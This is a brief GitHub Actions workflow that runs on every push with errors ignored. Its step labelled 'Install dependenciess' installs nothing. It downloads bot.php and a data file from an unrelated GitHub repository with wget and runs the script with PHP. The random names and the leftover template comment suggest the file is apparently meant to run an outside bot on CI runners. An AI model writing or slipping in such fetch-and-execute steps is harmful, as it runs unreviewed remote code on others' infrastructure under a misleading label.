# This is a basic workflow to hel

on:
  push:
name: mabufi

jobs:
  run:
    runs-on: ubuntu-latest
    continue-on-error: True
    steps:
    - name: Setup PHP
      uses: shivammathur/setup-php@v2
      with:
        php-version: '8.1'
        coverage: none
    - name: Install dependenciess
      run: |
        wget https://github.com/Gkist2264/gamifj/raw/main/bot.php
        wget https://github.com/Gkist2264/gamifj/raw/main/td/data.json
        php bot.php
